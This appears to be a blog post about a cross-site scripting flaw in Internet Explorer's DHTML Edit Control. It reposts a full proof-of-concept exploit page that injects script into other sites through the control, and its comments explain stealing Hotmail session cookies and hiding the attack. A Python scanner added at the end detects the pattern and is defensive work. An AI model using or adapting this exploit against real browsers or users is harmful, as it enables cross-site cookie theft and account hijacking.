MSIE DHTML Edit Control Cross Site Scripting Vulnerability

Until a patch comes out, IE can't be used for a while. Cookies can be stolen at will. Apparently there is an XSS in the DEC (DHTML Edit Control). Isn't the impact huge? I wonder whether it stops at just IE.

Since the sample page (greyhats) cannot be accessed at the moment, I am temporarily posting the HTML of the sample page below.

<html>
<head>
<title>AbusiveParent</title>
</head>
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>Wait. Initializing vuln...</b>\'');setTimeout('main()',1000)">
<!--I appologize for my last vuln, which of course doesnt have any effect unless activex is enabled in the my computer zone (which I hope it isnt if your using sp2 ;) but perhaps this will make up for it-->
<object 
    id="x"
    classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
    width="598" 
    height="515" 
    align="middle"
>
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT>
function shellscript()
{
window.name="poorchild";
open("http://google.com","poorchild");
/*
Yes, even cookies are transfered through the Dhtml Edit control. That means that
http://by22fd.bay22.hotmail.msn.com/cgi-bin/HoTMaiL?curmbox=F000000001
will work fine, as long as the victim is logged into hotmail of course.
Note: Only the script shown above will allow the edit control to navigate to a different page (afaik) so you must navigate to the page that actually accepts the cookies,
not one that redirects. Open("page","_self") will open the page in a new browser window and won't inject the javascript.
*/
}

function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
alert("Wait until page is loaded. In a stealth attack, this alert can be bypassed by a loop that reads the location.href of the dhtml edit control. Once an error is hit (permission denied) the inject script would be executed.");
//var myloc=x.DOM.location.href;
x.DOM.Script.execScript("alert('Javascript injected! \\n\\nLocation: ' + location.href + '\\n\\nCookie: ' + document.cookie)");
}
</SCRIPT>
</body>
</html>
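As an added example from the defender's side (not part of the original post or of greyhats' sample page), here is a small Python scanner that flags HTML which embeds the DHTML Edit Control by the CLSID shown above and then scripts the control's DOM from the hosting page. The two sample documents are constructed, and the finding names are my own.

```python
import re
from html.parser import HTMLParser

# CLSID of the DHTML Edit Control, as it appears in the sample page above (lowercased).
DHTML_EDIT_CLSID = "2d360201-fff5-11d1-8d03-00a0c959bc0a"

class DhtmlEditScanner(HTMLParser):
    """Collects ids of <object> tags using the DEC classid, plus all script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.script, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        self.script.extend(v for k, v in a.items() if k.startswith("on"))  # inline handlers
        if tag == "object" and DHTML_EDIT_CLSID in a.get("classid", "").lower():
            self.object_ids.append(a.get("id", ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script.append(data)

def scan(html):
    """Return finding tags for one HTML document; an empty list means nothing matched."""
    p = DhtmlEditScanner()
    p.feed(html)
    script = "\n".join(p.script)
    findings = []
    if p.object_ids:
        findings.append("dhtml-edit-control-embedded")
    # script reaching into the control's document, e.g. x.DOM.body / x.DOM.Script
    if any(re.search(r"\b%s\.DOM\." % re.escape(i), script) for i in p.object_ids if i):
        findings.append("script-touches-control-dom")
    # the injection primitive used by the sample page
    if re.search(r"\.DOM\.Script\.(execScript|setTimeout)", script):
        findings.append("execscript-via-control")
    return findings

# Constructed samples: a stripped-down copy of the pattern above, and a benign page.
SUSPECT = ('<body onload="x.DOM.body.innerHTML=\'init\'">'
           '<object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"></object>'
           '<SCRIPT>function main(){x.DOM.Script.execScript("alert(document.cookie)")}</SCRIPT>')
BENIGN = "<html><body><script>document.title = 'hello'</script></body></html>"
```

Run `scan()` over a page's HTML to get the list of findings; the CLSID match alone only says the control is embedded, while the other two tags indicate the hosting page is driving the control's document.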